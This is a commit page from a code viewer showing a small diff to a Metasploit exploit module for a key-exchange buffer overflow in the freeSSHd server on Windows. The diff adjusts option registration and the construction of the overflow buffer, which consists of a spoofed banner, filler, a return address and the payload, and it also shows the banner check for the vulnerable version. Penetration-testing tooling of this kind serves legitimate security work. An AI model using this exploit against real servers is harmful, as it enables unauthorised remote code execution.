since i installed the previous stuff, thought i'd clean up another module.
git-svn-id: file:///home/svn/framework3/trunk@4185 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
b471b077d5
commit
603f58a90c
|
@ -46,7 +46,7 @@ class Exploits::Windows::Ssh::Freesshd_key_exchange < Msf::Exploit::Remote
|
|||
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options( [ Opt::RPORT(22) ], self)
|
||||
register_options( [ Opt::RPORT(22) ], self.class)
|
||||
|
||||
end
|
||||
|
||||
|
@ -56,8 +56,8 @@ class Exploits::Windows::Ssh::Freesshd_key_exchange < Msf::Exploit::Remote
|
|||
sploit = "SSH-2.0-OpenSSH_3.9p1"
|
||||
sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
|
||||
sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
|
||||
sploit << Rex::Text.rand_text_alphanumeric(1055, payload_badchars) + [target.ret].pack('V')
|
||||
sploit << payload.encoded + Rex::Text.rand_text_alphanumeric(23500, payload_badchars) + "\r\n"
|
||||
sploit << Rex::Text.rand_text_alphanumeric(1055) + [target.ret].pack('V')
|
||||
sploit << payload.encoded + Rex::Text.rand_text_alphanumeric(19000) + "\r\n"
|
||||
|
||||
res = sock.recv(22)
|
||||
if ( res =~ /SSH-2.0-WeOnlyDo 1.2.7/)
|
||||
|
|
Loading…
Reference in New Issue